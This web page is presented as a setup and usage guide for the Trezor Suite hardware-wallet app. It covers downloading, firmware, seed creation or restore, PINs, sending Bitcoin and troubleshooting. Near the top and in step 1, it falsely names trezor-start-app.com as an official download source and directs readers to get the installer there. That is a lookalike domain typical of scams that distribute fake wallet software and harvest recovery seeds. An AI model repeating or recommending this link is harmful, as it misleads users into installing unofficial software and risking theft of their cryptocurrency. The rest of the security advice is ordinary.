Trezor Suite is the official desktop and web application for all Trezor hardware wallets. This complete guide explains how to set up and use Trezor Suite step-by-step — from downloading the app to sending your first Bitcoin transaction securely.

What is Trezor Suite?

Trezor Suite is the official software application developed by SatoshiLabs for managing Trezor hardware wallets. It replaced the older Trezor Wallet (wallet.trezor.io) interface in 2021 and is now the primary way to interact with your Trezor device.

Trezor Suite is available as a desktop application (Windows, macOS, Linux) and as a web app at suite.trezor.io. Both versions provide the same level of security — your private keys always remain on the Trezor hardware device.

💡
Pro tip: Always download Trezor Suite from the official source only. Never use third-party download links. The official Trezor Suite download is available at trezor-start-app.com or directly from trezor.io.

Step-by-Step: How to Set Up Trezor Suite

1

Download Trezor Suite App

Go to trezor-start-app.com and click the download button for your operating system — Windows, macOS, or Linux. You can also use the Trezor Suite web app directly in your browser without installation. The download is completely free.

2

Install and Open Trezor Suite

Run the downloaded installer (Windows: .exe, macOS: .dmg, Linux: .AppImage). After installation, open Trezor Suite. The application will greet you with a setup screen and check for any available updates automatically.

3

Connect Your Trezor Hardware Wallet

Plug your Trezor device (Model One, Model T, or Safe 3) into your computer using the USB cable included in the box. Trezor Suite will automatically detect the connected device. Your browser may ask to install the Trezor Bridge — follow the prompts if using the web app.

4

Install or Update Firmware

If your Trezor is brand new, Trezor Suite will prompt you to install the latest firmware. Connect your device and follow the on-screen instructions. Always install firmware only from within the official Trezor Suite application — never from external sources.

5

Create a New Wallet or Restore Existing

Choose between two options: Create a new wallet (generates a fresh seed phrase on your device) or Restore wallet (enter your existing 12 or 24-word recovery seed phrase). If you already own a Trezor with a seed, choose Restore.

6

Write Down Your Recovery Seed

If creating a new wallet, Trezor will display your recovery seed — a series of 12 or 24 random words. Write every word down carefully on paper in exact order. This seed is the only backup to your funds — never store it digitally, never photograph it, and never share it with anyone.

⚠️
Security Warning: Anyone who obtains your recovery seed phrase has complete access to your funds. Store your seed phrase on paper, in a fireproof location, or on metal backup. Never enter it into any website or software that is not your official Trezor device.
7

Set Your PIN

Create a secure PIN directly on your Trezor device screen. For Trezor Model One, the PIN entry grid is shown only on the device display (not the computer screen), making it impossible for keyloggers to capture. Choose a PIN that is at least 4 digits — longer is better.

8

Start Using Trezor Suite

Your wallet is now set up! Trezor Suite will show your portfolio dashboard with Bitcoin and other coin balances. You can now receive cryptocurrency (use the Receive tab to get your wallet address), send transactions (use Send tab, always verify addresses on device), and access all other features.

How to Send Bitcoin with Trezor Suite

Sending Bitcoin with Trezor Suite is simple and secure. Here is how to do it:

  1. Open Trezor Suite and connect your Trezor hardware wallet
  2. Click on your Bitcoin account in the left sidebar
  3. Click the "Send" button
  4. Enter the recipient's Bitcoin address in the "To" field
  5. Enter the amount to send (in BTC or your local currency)
  6. Select the transaction fee (Low, Normal, or High depending on urgency)
  7. Review the transaction details carefully on your computer screen
  8. Verify the address and amount on your Trezor device screen
  9. Confirm the transaction by pressing the button on your Trezor device
  10. Your transaction is now signed and broadcast to the Bitcoin network
🔒
Always verify on device: The most important step is verifying the recipient address on your Trezor hardware screen before confirming. This protects you from clipboard-hijacking malware that can silently change addresses on your computer screen.

Trezor Suite vs Trezor Web App: Which to Use?

Trezor Suite Desktop and the Trezor Suite Web App offer the same core features. Here are the key differences:

Troubleshooting Common Trezor Suite Issues

Trezor Suite Not Detecting My Device

If Trezor Suite doesn't recognize your hardware wallet: 1) Try a different USB cable or port, 2) Install Trezor Bridge if using the web app, 3) Restart Trezor Suite, 4) Check that your operating system is up to date. On Linux, you may need to install udev rules.

Trezor Suite Showing Wrong Balance

Trezor Suite needs to sync with the blockchain to show accurate balances. Wait a few minutes for the sync to complete. If the balance still appears wrong, try clicking the refresh button or switching between public and private nodes in Settings.

Forgot Trezor PIN

If you forget your Trezor PIN, the device will wipe itself after a certain number of incorrect attempts. You can restore your wallet using your recovery seed phrase. This is why keeping your seed phrase safe is absolutely critical.
